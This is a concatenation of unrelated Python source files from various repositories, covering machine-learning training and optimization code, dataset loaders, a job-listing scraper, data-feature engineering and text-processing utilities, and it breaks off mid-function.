:param P_fitness: Fitness of population.
:param A: Former elite population boolean array.
:return: Updated elite population boolean array.
"""
median = np.median(P_fitness)
if A is None:
A = P_fitness < median
else:
A[:] = P_fitness < median
return A
def __update__(P, A, loc):
"""
Update probabilistic graphical model based on elite population.
:param A: A boolean array denoting whether the individual in that index is from the elite or not.
:param P: The proper population of the EDA.
:param loc: Former means of the probabilistic graphical model.
:return: Updated mean for probabilistic graphical model.
"""
loc[:] = 0.
n_elite = np.count_nonzero(A)
for i in range(len(A)):
if A[i]:
loc += P[i].voting_weights
loc[:] /= float(n_elite)
return loc
def __get_best_individual__(P, P_fitness):
"""
Returns best individual from the population.
:param P: Proper population of individuals.
:param P_fitness: Fitness of population.
:return: The best individual from the population.
"""
return P[np.argmin(P_fitness)] # type: Ensemble
def __save__(reporter, generation, A, P, P_fitness, loc, scale):
"""
Saves metadata from EDA.
:param reporter: eda.Reporter
:param generation: generation index.
:param P: Population of individuals.
:param loc: Mean of probabilistic graphical model variables' PMF.
:param scale: Std deviation of probabilistic graphical model variables' PMF.
"""
try:
reporter.save_population(generation=generation, elite=A, ensembles=P, P_fitness=P_fitness)
reporter.save_gm(generation, loc, scale)
except AttributeError:
pass
def integrate(ensemble, n_individuals=100, n_generations=100, use_weights=True, reporter=None, verbose=True):
"""
Optimize voting weights for an ensemble of base classifiers.
:type ensemble: eda.Ensemble
:param ensemble: ensemble of base classifiers.
:type n_individuals: int
:param n_individuals: optional - number of individuals. Defaults to 100.
:type n_generations: int
:param n_generations: optional - number of generations. Defaults to 100.
:type use_weights: bool
:param use_weights: Whether to use former weights from AdaBoost or not.
:type reporter: reporter.EDAReporter
:param reporter: optional - reporter for storing data about the evolutionary process.
Defaults to None (no recording).
:type verbose: bool
:verbose: whether to output to console. Defaults to true.
:return: The same ensemble, with optimized voting weights.
"""
n_classifiers = ensemble.n_classifiers
n_classes = ensemble.n_classes
classes = ensemble.classes
# overrides prior seed
np.random.seed(None)
random.seed(None)
scale = 0.25
decay = scale / float(n_generations)
if use_weights:
loc = np.empty((n_classifiers, n_classes), dtype=np.float32)
loc[:] = ensemble.voting_weights[:]
else:
loc = np.random.normal(loc=1., scale=scale, size=(n_classifiers, n_classes)).astype(dtype=np.float32)
all_preds = ensemble.get_predictions(ensemble.X_train)
for i, some_class in enumerate(classes):
if n_classes == 2:
loc[:, i] = LogisticRegression().fit(all_preds.T, ensemble.y_train).coef_
break
else:
binary_preds = (all_preds == some_class).astype(np.int32)
loc[:, i] = LogisticRegression().fit(binary_preds.T, ensemble.y_train == some_class).coef_
P = []
for i in range(n_individuals):
P += [copy.deepcopy(ensemble)]
P_fitness = np.empty(n_individuals, dtype=np.float32)
A = np.zeros(n_individuals, dtype=np.int32)
t1 = dt.now()
last_median = 0
streak = 0
max_streak = 5
# ensemble_train_acc = accuracy_score(ensemble.y_train, ensemble.predict(ensemble.X_train))
# dfd = ensemble.dfd(ensemble.X_train, ensemble.y_train)
# print('generation %02.d: ens val acc: %.4f dfd: %.4f time elapsed: %f' % (
# -1, ensemble_train_acc, dfd, (dt.now() - t1).total_seconds()
# ))
# __save__(
# reporter=reporter, generation=-1, A=[0], P=[ensemble], P_fitness=[0], loc=loc, scale=scale
#)
g = 0
while g < n_generations:
for i in range(n_individuals):
if not A[i]:
P[i] = P[i].resample_voting_weights(loc=loc, scale=scale)
train_probs = P[i].predict_proba(P[i].X_train)
argtrain = np.argmax(train_probs, axis=1)
argwrong_train = np.flatnonzero(argtrain != P[i].y_train)
wrong_train = np.max(train_probs[argwrong_train, :], axis=1)
P_fitness[i] = np.sum(wrong_train)
A = __get_elite__(P_fitness, A=A)
best_individual = __get_best_individual__(P, P_fitness) # type: Ensemble
__save__(
reporter=reporter, generation=g, A=A, P=P, P_fitness=P_fitness, loc=loc, scale=scale
)
ensemble_train_acc = accuracy_score(ensemble.y_train, best_individual.predict(ensemble.X_train))
dfd = best_individual.dfd(ensemble.X_train, ensemble.y_train)
median = float(np.median(P_fitness, axis=0)) # type: float
if np.max(A) == 0:
break
if streak >= max_streak:
break
condition = (abs(last_median - median) < 0.01)
streak = (streak * condition) + condition
last_median = median
loc = __update__(P, A, loc)
scale -= decay
t2 = dt.now()
if verbose:
print('generation %02.d: ens val acc: %.4f dfd: %.4f median: %.4f time elapsed: %f' % (
g, ensemble_train_acc, dfd, median, (t2 - t1).total_seconds()
))
t1 = t2
g += 1
best_individual = __get_best_individual__(P, P_fitness) # type: Ensemble
__save__(
reporter=reporter, generation=g, A=A, P=P, P_fitness=P_fitness, loc=loc, scale=scale
)
return best_individual
| 6,519 |
latent_rationale/hans/hans_dataset.py
|
mikimn/interpretable_predictions
| 0 |
2169479
|
import datasets
class HansConfig(datasets.BuilderConfig):
"""BuilderConfig for HANS."""
def __init__(self, **kwargs):
"""BuilderConfig for HANS.
Args:
.
**kwargs: keyword arguments forwarded to super.
"""
super(HansConfig, self).__init__(version=datasets.Version("1.0.0", ""), **kwargs)
class Hans(datasets.GeneratorBasedBuilder):
"""Hans: Heuristic Analysis for NLI Systems."""
def _info(self):
return datasets.DatasetInfo(
description="HANS",
features=datasets.Features(
{
"premise": datasets.Value("string"),
"hypothesis": datasets.Value("string"),
"label": datasets.features.ClassLabel(names=["entailment", "non-entailment"]),
"parse_premise": datasets.Value("string"),
"parse_hypothesis": datasets.Value("string"),
"binary_parse_premise": datasets.Value("string"),
"binary_parse_hypothesis": datasets.Value("string"),
"heuristic": datasets.Value("string"),
"subcase": datasets.Value("string"),
"template": datasets.Value("string"),
}
),
supervised_keys=None,
homepage="https://github.com/tommccoy1/hans",
citation="HANS",
)
def _vocab_text_gen(self, filepath):
for _, ex in self._generate_examples(filepath):
yield " ".join([ex["premise"], ex["hypothesis"]])
def _split_generators(self, dl_manager):
train_path = dl_manager.download_and_extract(
"https://raw.githubusercontent.com/tommccoy1/hans/master/heuristics_train_set.txt"
)
valid_path = dl_manager.download_and_extract(
"https://raw.githubusercontent.com/tommccoy1/hans/master/heuristics_evaluation_set.txt"
)
return [
datasets.SplitGenerator(name=datasets.Split.TRAIN, gen_kwargs={"filepath": train_path}),
datasets.SplitGenerator(name=datasets.Split.VALIDATION, gen_kwargs={"filepath": valid_path}),
]
def _generate_examples(self, filepath):
"""Generate hans examples.
Args:
filepath: a string
Yields:
dictionaries containing "premise", "hypothesis" and "label" strings
"""
for idx, line in enumerate(open(filepath, "rb")):
if idx == 0:
continue # skip header
line = line.strip().decode("utf-8")
split_line = line.split("\t")
# Examples not marked with a three out of five consensus are marked with
# "-" and should not be used in standard evaluations.
if split_line[0] == "-":
continue
# Works for both splits even though dev has some extra human labels.
yield idx, {
"premise": split_line[5],
"hypothesis": split_line[6],
"label": split_line[0],
"binary_parse_premise": split_line[1],
"binary_parse_hypothesis": split_line[2],
"parse_premise": split_line[3],
"parse_hypothesis": split_line[4],
"heuristic": split_line[8],
"subcase": split_line[9],
"template": split_line[10],
}
| 3,437 |
JobFinder2000/spiders/job_spider.py
|
nickdehart/JobFinder2000
| 0 |
2167330
|
import scrapy
import re
import requests
from datetime import datetime
from pymongo import MongoClient
class JobSpider(scrapy.Spider):
name = "jobs"
def start_requests(self):
url_start = 'https://stackoverflow.com/jobs?r=true&ms=Junior&mxs=MidLevel&ss=1&sort=p'
urls = []
urls.append(url_start)
# only concerned with first 10 pages of results
for i in range(2, 11):
urls.append(url_start + '&pg=' + str(i))
for url in urls:
yield scrapy.Request(url=url, callback=self.parse)
def parse(self, response):
client = MongoClient()
db = client.Jobs
collection = db.listings
for row in response.css('body div.container div.snippet-hidden div.main-columns div div.js-search-results div.listResults div'):
href = row.css('div.-job-summary div.-title h2 a::attr(href)').get()
try:
href = 'http://www.stackoverflow.com' + href
jobId = href.split('/')[-2]
except:
href = ''
jobId = ''
previous = collection.find_one({'jobId': jobId})
if jobId and not previous:
try:
res = requests.get('https://stackoverflow.com/jobs/apply/' + jobId)
except Exception as e:
self.log(e)
try:
collection.insert_one( {
'jobId': jobId,
'title': row.css('div.-job-summary div.-title h2 a::text').get(),
'href': href,
'tags': row.css('div.-job-summary div.-tags a::text').getall(),
'perks': self.remove_whitespace(row.css('div.-job-summary div.-perks span::text').getall()),
'timestamp': datetime.now(),
'applied': False,
'external': True if res.status_code == 404 else False
} )
except Exception as e:
self.log(e)
def remove_whitespace(self, lst):
temp = [x.replace(" ", "") for x in lst]
temp = [x.replace("\n", "") for x in temp]
temp = [x.replace("\r", "") for x in temp]
return([x.replace("|", " | ") for x in temp])
def check_tags(self, tags):
my_tags = [
"python",
"django",
"python3",
"data-science",
"machine-learning",
"javascript",
"reactjs",
"angular",
"node.js",
"redux",
"objective-c",
"swift",
"xcode",
"typescript",
"vue.js",
"c++",
"bigdata",
"data-ingestion",
"elasticsearch",
"c",
"analytics",
"react",
"opencv",
"angularjs",
"next.js",
"ember.js",
"nodejs",
"pandas",
]
return any(x in my_tags for x in tags )
def check_salary(self, perks):
matches = []
for perk in perks:
matches.extend(re.findall('\d{2,3}', perk))
return True if (all(int(x) > 50 for x in matches)) else False
| 3,727 |
tfoms/l2.py
|
Wellheor1/l2
| 10 |
2169334
|
import logging
from urllib.parse import urljoin
import requests
from appconf.manager import SettingManager
logger = logging.getLogger(__name__)
def get_url(path, base=None):
return urljoin(base or SettingManager.get("l2_patients_url", default='http://localhost/if', default_type='s'), path)
def get_headers(token=None):
return {"Authorization": "Bearer {}".format(token or SettingManager.get("l2_patients_token", default='token', default_type='s'))}
def make_request(path, json_data=None, base=None, token=None):
if json_data is None:
json_data = {}
text_resp = None
try:
url = get_url(path, base=base)
headers = get_headers(token=token)
data = requests.post(url, headers=headers, json=json_data)
text_resp = data.text
data = data.json()
return data
except Exception as e:
logger.exception(e)
logger.exception(text_resp)
return {}
def check_l2_enp(enp) -> dict:
data = make_request("check-enp", {"enp": enp, "check_mode": "l2-enp"})
return data
def check_l2_patient(family, name, patronymic, bd) -> dict:
data = make_request("check-enp", {"family": family, "name": name, "patronymic": patronymic, "bd": bd, "check_mode": "l2-enp-full"})
return data
def update_doc_call_status(external_num, status, oid, code_tfoms) -> dict:
data = make_request("doc-call-update-status", {"externalNum": external_num, "status": status, "org": {"oid": oid, "codeTFOMS": code_tfoms}})
return data
def send_doc_call(base, token, data) -> dict:
data = make_request("doc-call-send", data, base=base, token=token)
return data
| 1,655 |
trafficdb/wsgi.py
|
rjw57/trafficdb
| 1 |
2169765
|
"""
WSGI-compatible web application
===============================
"""
from flask import Flask
from flask.ext.migrate import Migrate
def create_app():
# Create root webapp
app = Flask(__name__)
app.config.from_pyfile('defaultconfig.py')
# Register this app with the database
from trafficdb.models import db
db.init_app(app)
# Create migration helper
migrate = Migrate(app, db)
# Create blueprints
import trafficdb.blueprint as bp
for bp_name in bp.__all__:
app.register_blueprint(getattr(bp, bp_name), url_prefix='/'+bp_name)
return app
| 600 |
2020/Day10/day10_solution_part2.py
|
samyak-jn/AdventofCode
| 0 |
2167736
|
def get_values(filename):
with open(filename) as f:
data = f.read()
doc = data.split("\n")
li = []
for i in doc:
if i =="":
continue
li.append(int(i.strip()))
return li
if __name__=="__main__":
filename = "./input.txt"
input = get_values(filename)
input.append(0)
input = sorted(input)
inbuilt_adapter = input[-1]+3
input.append(inbuilt_adapter)
parse_ways = [0]*(max(input)+1)
parse_ways[0]=1
for i in input[1:]:
parse_ways[i] += parse_ways[i-1]
if i>=2:
parse_ways[i] += parse_ways[i-2]
if i>=3:
parse_ways[i] += parse_ways[i-3]
print(parse_ways[-1])
| 638 |
src/data_transformations.py
|
alexrobwong/spotify-playlist-success
| 0 |
2169840
|
import numpy as np
import logging
from copy import deepcopy
logging.basicConfig(level=logging.INFO)
def create_features(raw_frame):
"""
Derive features from the orginal ones provided in the spotify playlist success data
:params raw_frame: original dataframe from the case provided file provided "playlist_summary_external.txt"
"""
features_frame = (
raw_frame.assign(monhtly_skips=lambda f: (f["streams"] - f["stream30s"]) * 30)
.assign(tracks_per_album=lambda f: f["n_tracks"] / f["n_albums"])
.assign(artists_per_album=lambda f: f["n_artists"] / f["n_albums"])
.assign(
owner_stream=lambda f: np.where(f["monthly_owner_stream30s"] == 0, 0, 1)
)
.assign(
mau_adjusted=lambda f: np.where(
f["owner_stream"] == 1, f["mau"] - 1, f["mau"]
)
)
.assign(
users_adjusted=lambda f: np.where(
f["owner_stream"] == 1, f["users"] - 1, f["users"]
)
)
.assign(
monhtly_non_owner_stream30s=lambda f: f["monthly_stream30s"]
- f["monthly_owner_stream30s"]
)
.assign(
streaming_ratio_mau=lambda f: f["monhtly_non_owner_stream30s"]
/ f["mau_adjusted"]
)
.assign(
streaming_ratio_users=lambda f: f["monhtly_non_owner_stream30s"]
/ f["users_adjusted"]
)
.assign(skip_ratio_users=lambda f: f["monhtly_skips"] / f["users"])
.assign(mau_perc=lambda f: f["mau"] / f["users"])
.assign(mau_new=lambda f: f["mau"] - f["mau_previous_month"])
.assign(
mau_new_perc=lambda f: np.where(
f["mau_previous_month"] == 0,
0,
f["mau_new"] / f["mau_previous_month"] * 100,
)
)
)
# How many tokens in each playlist title?
count_tokens = []
for token in list(features_frame["tokens"]):
count_tokens.append(len(eval(token)))
features_frame["title_length"] = count_tokens
# Extracting user_id and playlist_id
list_user = []
list_playlist = []
for playlist_uri in features_frame["playlist_uri"]:
tokens = playlist_uri.split(":")
list_user.append(tokens[2])
list_playlist.append(tokens[4])
features_frame["user_id"] = list_user
features_frame["playlist_id"] = list_playlist
return features_frame.reset_index(drop=True)
def classify_success(feature_frame, users_threshold=10, success_threshold=0.75):
"""
Label playlists as successful based on if their streaming ratio is above a certain threshold
"""
assert (
users_threshold >= 10,
"Acoustic features from Spotify API only obtained for playlists with more than 10 "
"monthly users",
)
# Filtering out playlists with an outlier number of tracks
n_tracks_upper_quantile = feature_frame["n_tracks"].quantile(0.75)
n_tracks_lower_quantile = feature_frame["n_tracks"].quantile(0.25)
iqr = n_tracks_upper_quantile - n_tracks_lower_quantile
upper_track_limit = n_tracks_upper_quantile + (1.5 * iqr)
lower_track_limit = n_tracks_lower_quantile - (1.5 * iqr)
target_frame = (
feature_frame.loc[lambda f: f["n_tracks"] <= upper_track_limit]
.loc[lambda f: f["n_tracks"] >= lower_track_limit]
.loc[lambda f: f["users_adjusted"] > users_threshold]
).reset_index(drop=True)
num_playlists_all = len(feature_frame)
num_playlists_thresh = len(target_frame)
logging.info(f"# of playlists: {num_playlists_all}")
logging.info(f"# of playlists above the users_threshold: {num_playlists_thresh}")
logging.info(f"% of playlists removed: {num_playlists_all - num_playlists_thresh}")
logging.info(
f"% of playlists remaining: {round(num_playlists_thresh / num_playlists_all * 100, 1)}"
)
threshold_frame_plays = target_frame.groupby("genre_1").quantile(
q=success_threshold
)[["streaming_ratio_users"]]
threshold_frame_plays.columns = [
str(col) + "_thresh" for col in threshold_frame_plays.columns
]
success_frame = target_frame.merge(
threshold_frame_plays.reset_index()[
[
"genre_1",
"streaming_ratio_users_thresh",
]
],
on="genre_1",
how="left",
).assign(
success_streaming_ratio_users=lambda f: np.where(
f["streaming_ratio_users"] >= f["streaming_ratio_users_thresh"], 1, 0
)
)
return success_frame
def add_suffixes(frame, suffix):
renamed_frame = deepcopy(frame)
renamed_frame.columns = [
str(col) + suffix if col not in ["track_id", "user_id", "playlist_id"] else col
for col in renamed_frame.columns
]
return renamed_frame
| 4,862 |
HW1-2/add_layer_homework.py
|
killua4564/DeepLearningHW
| 0 |
2169917
|
import tensorflow as tf
import numpy as np
# 定義一個添加層的函數
def add_layer(inputs, input_tensors, output_tensors, activation_function = None):
W = tf.Variable(tf.random_normal([input_tensors, output_tensors]))
b = tf.Variable(tf.zeros([1, output_tensors]))
formula = tf.add(tf.matmul(inputs, W), b)
if activation_function is None:
outputs = formula
else:
outputs = activation_function(formula)
return outputs
# 準備資料
x_data = np.random.rand(100)
x_data = x_data.reshape(len(x_data), 1)
y_data = x_data * 0.1 + 0.3
# 建立 Feeds
feeds_data = [[1], [2], [3], [4], [5], [6], [7], [8], [9], [0]]
x_feeds = tf.placeholder(tf.float32, shape = [10, 1])
y_feeds = tf.placeholder(tf.float32, shape = [10, 1])
# 添加 1 個隱藏層
hidden_layer = add_layer(x_feeds, input_tensors = 1, output_tensors = 10, activation_function = None)
# 添加 1 個輸出層
output_layer = add_layer(hidden_layer, input_tensors = 10, output_tensors = 1, activation_function = None)
# 定義 `loss` 與要使用的 Optimizer
loss = tf.reduce_mean(tf.square(y_feeds - output_layer))
optimizer = tf.train.GradientDescentOptimizer(learning_rate = 0.01)
train = optimizer.minimize(loss)
# 初始化 Graph 並開始運算
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
for step in range(201):
sess.run(output_layer, feed_dict = {x_feeds: feeds_data, y_feeds: feeds_data})
if step % 20 == 0:
print(sess.run(loss, feed_dict = {x_feeds: feeds_data, y_feeds: feeds_data}))
sess.close()
| 1,527 |
core/management/commands/ensuremongocollections.py
|
fruviad/combine
| 24 |
2169672
|
# generic imports
import logging
# django
from django.core.management.base import BaseCommand, CommandError
# import core
from core.models import *
# Get an instance of a logger
logger = logging.getLogger(__name__)
class Command(BaseCommand):
help = 'Ensure Mongo collections are created, and have proper indices'
def handle(self, *args, **options):
# Record model
logger.debug('ensuring indices for record collection')
Record.ensure_indexes()
# RecordValidation model
logger.debug('ensuring indices for record_validation collection')
RecordValidation.ensure_indexes()
# IndexMappingFailure model
logger.debug('ensuring indices for index_mapping_failures collection')
IndexMappingFailure.ensure_indexes()
# return
self.stdout.write(self.style.SUCCESS('Mongo collections and indices verified and/or created'))
| 914 |
wn_trainer.py
|
cbquillen/wavenet_experiment
| 2 |
2169999
|
#!/usr/bin/env python
'''
This is a quick demo hack of a wavenet trainer, with some help
of infrastructure from ibab.
<NAME>
'''
from __future__ import print_function
from six.moves import range
from functools import reduce
import optparse
import sys
import time
from operator import mul
import tensorflow as tf
import tensorflow.contrib.layers as layers
from audio_reader import AudioReader
from wavenet import wavenet, compute_overlap
# Options from the command line:
parser = optparse.OptionParser()
parser.add_option('-p', '--param_file', dest='param_file',
default=None, help='File to set parameters')
parser.add_option('-l', '--logdir', dest='logdir',
default=None, help='Tensorflow event logdir')
parser.add_option('-a', '--audio_root_dir', default='.',
help='Root directory for the training audio.')
parser.add_option('-i', '--input_file', dest='input_file',
default=None, help='Input checkpoint file')
parser.add_option('-o', '--output_file', dest='output_file',
default='ckpt', help='Output checkpoint file')
parser.add_option('-d', '--data', dest='data_list',
default='slt_f0b.txt', help='Corpus database file')
parser.add_option('-c', '--checkpoint_rate', dest='checkpoint_rate',
type=int, default=1000, help='Rate to checkpoint.')
parser.add_option('-s', '--summary_rate', dest='summary_rate',
type=int, default=20, help='Rate to output summaries.')
parser.add_option('-S', '--silence_threshold', dest='silence_threshold',
type=float, default=0.2,
help='Silence classifier energy threshold')
parser.add_option('-Z', '--audio_chunk_size', dest='audio_chunk_size',
type=int, default=500, help='Audio chunk size per batch.')
parser.add_option('-L', '--base_learning_rate', dest='base_learning_rate',
type=float, default=1e-03,
help='The initial learning rate. ' +
'lr = base_learning_rate/(1.0+lr_offet+timestep)*const)')
parser.add_option('-O', '--lr_offset', dest='lr_offset', type=int, default=0,
help="lr=base_learning_rate/(1.0+timestep+lr_offset)*const)")
parser.add_option('-H', '--histogram_summaries', dest='histogram_summaries',
action='store_true', default=False,
help='Do histogram summaries')
opts, cmdline_args = parser.parse_args()
# Options that can be set in a parameter file:
opts.canonical_epoch_size = 5000.0
opts.n_chunks = 10 # How many utterance chunks to train at once.
opts.input_kernel_size = 64 # The size of the input layer kernel.
opts.kernel_size = 4 # The size of other kernels.
opts.num_outputs = 128 # The number of convolutional channels.
opts.num_outputs2 = opts.num_outputs # The "inner" convolutional channels.
opts.skip_dimension = 512 # The dimension for skip connections.
opts.dilations = [[2**N for N in range(8)]] * 5
opts.epsilon = 1e-4 # Adams optimizer epsilon.
opts.max_steps = 400000
opts.sample_rate = 16000
opts.max_checkpoints = 30
opts.reverse = False # not used in this version..
opts.clip = 0.1
opts.context = 3 # 2 == biphone, 3 == triphone.
opts.n_phones = 41
opts.n_users = 1
opts.n_mfcc = 20
opts.mfcc_weight = 0.001
opts.nopad = False # True to use training without the padding method.
opts.dropout = 0.0
opts.feature_noise = 0.0
opts.r_scale = 1000.0 # Controls the minimum possible variance.
# Set opts.* parameters from a parameter file if you want:
if opts.param_file is not None:
with open(opts.param_file) as f:
exec(compile(f.read(), opts.param_file, 'exec'))
# smaller audio chunks increase the timesteps per epoch:
# this is normalized relative to a 100000 sample chunk.
opts.canonical_epoch_size *= 100000.0/(opts.audio_chunk_size*opts.n_chunks)
sess = tf.Session()
coord = tf.train.Coordinator() # Is this used for anything?
data = AudioReader(opts.audio_root_dir, opts.data_list, coord,
sample_rate=opts.sample_rate,
chunk_size=opts.audio_chunk_size,
overlap=0, reverse=False,
silence_threshold=opts.silence_threshold,
n_chunks=opts.n_chunks, queue_size=opts.n_chunks,
n_mfcc=opts.n_mfcc, context=opts.context)
assert opts.n_phones == data.n_phones
assert opts.n_users == data.n_users
data.start_threads(sess) # start data reader threads.
# Define the computational graph.
with tf.name_scope("input_massaging"):
batch, user, alignment, lf0, mfcc = \
data.dequeue(num_elements=opts.n_chunks)
# We will try to predict the batch from a slightly
# noisier version on the input.
orig_batch = batch
if opts.feature_noise > 0:
batch += tf.random_normal(tf.shape(batch), stddev=opts.feature_noise)
batch = tf.expand_dims(batch, -1)
wf_slice = slice(0, opts.audio_chunk_size)
in_user = user[:, wf_slice] if opts.n_users > 1 else None
mu, r, q, omfcc = wavenet(
(batch[:, wf_slice, :], in_user, alignment[:, wf_slice],
lf0[:, wf_slice]), opts, is_training=opts.base_learning_rate > 0)
with tf.name_scope("loss"):
label_range = slice(1, 1+opts.audio_chunk_size)
x = orig_batch[:, label_range]
delta = x - mu
the_exp = -r*tf.abs(delta) + q*delta
loss = tf.reduce_mean(-tf.log(0.5*(r-q*q/r)) - the_exp)
if opts.logdir is not None:
tf.summary.scalar(name="loss", tensor=loss)
# That should have created all training variables. Now we can make a saver.
saver = tf.train.Saver(tf.trainable_variables() +
tf.get_collection('batch_norm'),
max_to_keep=opts.max_checkpoints)
if opts.histogram_summaries:
tf.summary.histogram(name="wavenet", values=ms)
layers.summaries.summarize_variables()
reg_loss = tf.constant(0.0)
with tf.name_scope("mfcc_loss"):
mfcc_loss = tf.constant(0.0)
if opts.mfcc_weight > 0:
del_mfcc = mfcc - omfcc
mfcc_loss = tf.reduce_mean(del_mfcc*del_mfcc)
if opts.logdir is not None:
tf.summary.scalar(name='mfcc', tensor=mfcc_loss)
with tf.name_scope("reg_loss"):
if 'l2reg' in vars(opts):
reg_loss += sum(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))
learning_rate = tf.placeholder(tf.float32, shape=())
# adams_epsilon probably should be reduced near the end of training.
adams_epsilon = tf.placeholder(tf.float32, shape=())
# We might want to run just measuring loss and not training,
# perhaps to see what the loss variance is on the training.
# in that case, set opts.base_learning_rate=0
if opts.base_learning_rate > 0:
with tf.name_scope("optimizer"):
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate,
epsilon=adams_epsilon)
with tf.get_default_graph().control_dependencies(
tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
sum_loss = loss + opts.mfcc_weight*mfcc_loss + reg_loss
if opts.clip is not None:
gradients = optimizer.compute_gradients(
sum_loss, var_list=tf.trainable_variables())
clipped_gradients = [
(tf.clip_by_value(var, -opts.clip, opts.clip)
if var is not None else None, name)
for var, name in gradients]
minimize = optimizer.apply_gradients(clipped_gradients)
else:
minimize = optimizer.minimize(
sum_loss, var_list=tf.trainable_variables())
else:
minimize = tf.constant(0) # a noop.
if opts.logdir is not None:
summaries = tf.summary.merge_all()
init = tf.global_variables_initializer()
# Finalize the graph, so that any new ops cannot be created.
# this is good for avoiding memory leaks.
tf.get_default_graph().finalize()
print("Model variables:")
total_params = 0
for var in tf.trainable_variables() + tf.get_collection('batch_norm'):
vshape = var.get_shape().as_list()
total_params += reduce(mul, vshape)
print(" ", var.name, vshape)
print("Total model parameters:", total_params)
sys.stdout.flush()
if opts.logdir is not None:
summary_writer = tf.summary.FileWriter(logdir=opts.logdir,
graph=tf.get_default_graph())
# Initialize everything.
sess.run(init)
if opts.input_file is not None:
print("Restoring from", opts.input_file)
saver.restore(sess, opts.input_file)
# Main training loop:
last_time = time.time()
for global_step in range(opts.lr_offset, opts.max_steps):
# Decrease time-step by a factor of 10 for every 5 canonical epochs:
cur_lr = opts.base_learning_rate*10.0**(
-global_step/opts.canonical_epoch_size/5.0)
if (global_step + 1) % opts.summary_rate == 0 and opts.logdir is not None:
cur_loss, cur_mfcc_loss, summary_pb = sess.run(
[loss, mfcc_loss, summaries, minimize],
feed_dict={learning_rate: cur_lr,
adams_epsilon: opts.epsilon})[0:3]
summary_writer.add_summary(summary_pb, global_step)
else:
cur_loss, cur_mfcc_loss = sess.run(
[loss, mfcc_loss, minimize],
feed_dict={learning_rate: cur_lr,
adams_epsilon: opts.epsilon})[0:2]
new_time = time.time()
print(("loss[{}]: {:.3f} mfcc {:.3f} dt {:.3f} lr {:.4g}").format(
global_step, cur_loss, cur_mfcc_loss, new_time - last_time, cur_lr))
last_time = new_time
if (global_step + 1) % opts.checkpoint_rate == 0 and \
opts.output_file is not None:
saver.save(sess, opts.output_file, global_step)
sys.stdout.flush()
print("Training done.")
if opts.output_file is not None:
saver.save(sess, opts.output_file)
sess.close()
| 9,967 |
src/common_utils_data/nlp_functions.py
|
Mi524/common_utils_data
| 0 |
2169123
|
import re
from collections import defaultdict, Counter
from .regex_functions import replace_punctuations , replace_re_special, get_keyword_pat
from .os_functions import enter_exit
import xlrd
def convert_key2list(word_dict):
word_list = []
for k, v in word_dict.items():
for w in v :
word_list.append(w)
return word_list
def get_keyword_dict(path_list):
#保存每个关键词列所需颜色的文字
keyword_dict = defaultdict(set)
#保存每个关键词列 类别的数字
keyword_format_dict = defaultdict(str)
if type(path_list) != list:
path_list = [ path_list ]
for path in path_list:
wb = xlrd.open_workbook(path)
#sheet name传入颜色
sheet_names = wb.sheet_names()
for sn in sheet_names:
ws = wb.sheet_by_name(sn)
#表头,根据表头获取应该写入红色还是蓝色,还是粗体
header_list = []
try:
for x in ws.row(0):
if type(x.value) == str and x.value.strip() != '':
header = x.value.strip()
elif (type(x.value) == float or type(x.value) == int) :
header = str(x.value).rstrip('0').rstrip('.').strip()
else:
#为了防止两列中间隔一个空的表头单元格
header = None
if header != None:
header_list.append(header)
if not header_list:
enter_exit(f'Error when reading keywords:\n{path}-"{sn}" should have at least one table header(keyword column names).')
except IndexError:
enter_exit(f'Error when reading keywords:\n{path}-"{sn}" should have at least one table header(keyword column names).')
seen_keywords = set()
for row in list(ws.get_rows())[1:]:
for i,format_word in enumerate(header_list):
if format_word != None:
keyword_value = row[i].value
if type(keyword_value) == float and math.ceil(keyword_value) == keyword_value:
keyword = str(keyword_value).rstrip('0').rstrip('.').strip()
else: #必须去掉容易导致歧义的特殊符号
keyword = replace_re_special(str(keyword_value).strip().lower())
if keyword not in seen_keywords and keyword != "" :
keyword_dict[format_word].add(keyword)
seen_keywords.add(keyword)
#记录将每个颜色对应的关键词类
for h in header_list:
if h != None :
keyword_format_dict[h] = sn.strip().lower()
wb.release_resources()
return keyword_dict, keyword_format_dict
def get_stopword_list(stopwords_path):
stopword_list = defaultdict(int)
with open(stopwords_path,'r') as file:
stopwords = file.read().splitlines()
for s in stopwords:
if s.strip() != '':
stopword_list[s.strip()] = 1
return stopword_list
def process_text_eng(text, keyword_list=[], stopword_list=[], count_keywords_only = False):
#仅适用英文
#需要确保每个单词两边有空格
keyword_list = [ ' ' + k + ' ' for k in keyword_list ]
#加密邮件和数字
text = encript_email_pat(text)
text = encript_number_pat(text)
text = replace_punctuations(text, replace_to_symbol=' ', exclude=['@']).lower().strip()
text_list = text.split()
#split空格,去掉多空格,再重新组合,为了匹配单词的两边空格,text两边也要加上空格
text = ' ' + ' '.join(text_list) + ' '
#keyword_dict先加入本身就是单词的词组,再组合成regex里面的格式拆分
if not count_keywords_only and keyword_list:
keyword_list = keyword_list + text_list
#英文的处理,关键词搜索两边加上空格确保搜到的是英文
keyword_pat = get_keyword_pat(keyword_list)
if count_keywords_only:
text_list = re.findall(keyword_pat, text, flags=re.I)
else:
text_list = re.split(keyword_pat,text,flags=re.I)
text_list = [ x.lower() for x in text_list if x.strip() != '' ]
text_list = [ t.strip() for t in text_list ]
if stopword_list:
text_list = remove_stopwords(stopword_list, text_list)
text_list = remove_numbers(text_list)
text_list = remove_one_letter(text_list)
text_list = [x.capitalize() for x in text_list]
return text_list
def get_word_freq_dict(text, keyword_list, stopword_list, count_keywords_only=False, word_num=200):
text_list = process_text_eng(text,keyword_list,stopword_list, count_keywords_only=count_keywords_only )
word_count = dict(Counter(text_list).most_common(word_num))
return word_count
def remove_stopwords(stopword_list, word_list):
#转成字典再处理,尽量避免用 in list 的方式搜索
stopword_dict = { s :1 for s in stopword_list }
new_word_list = [ ]
for w in word_list:
if stopword_dict.get(w,None) == None:
new_word_list.append(w.lower().strip())
return new_word_list
def remove_numbers(word_list):
word_list = [ x for x in word_list if x.isdigit() == False]
return word_list
def remove_one_letter(word_list):
word_list = [x for x in word_list if len(x) >= 2 ]
return word_list
def encript_email_pat(text):
if type(text) == str and text.strip() != '':
email_like_pat = '([a-z0-9]{5,30})(@[^\u4e00-\u9fa5]+\.[a-z0-9]{2,15})'
while True:
if_match = re.search(email_like_pat, string=text)
if if_match != None:
text = re.sub(email_like_pat,repl='*****\g<2>',string=text)
else:
break
return text
def encript_number_pat(text):
if type(text) == str and text.strip() != '':
result = ""
number_counter = 0
new_text = str(text)
for c in new_text:
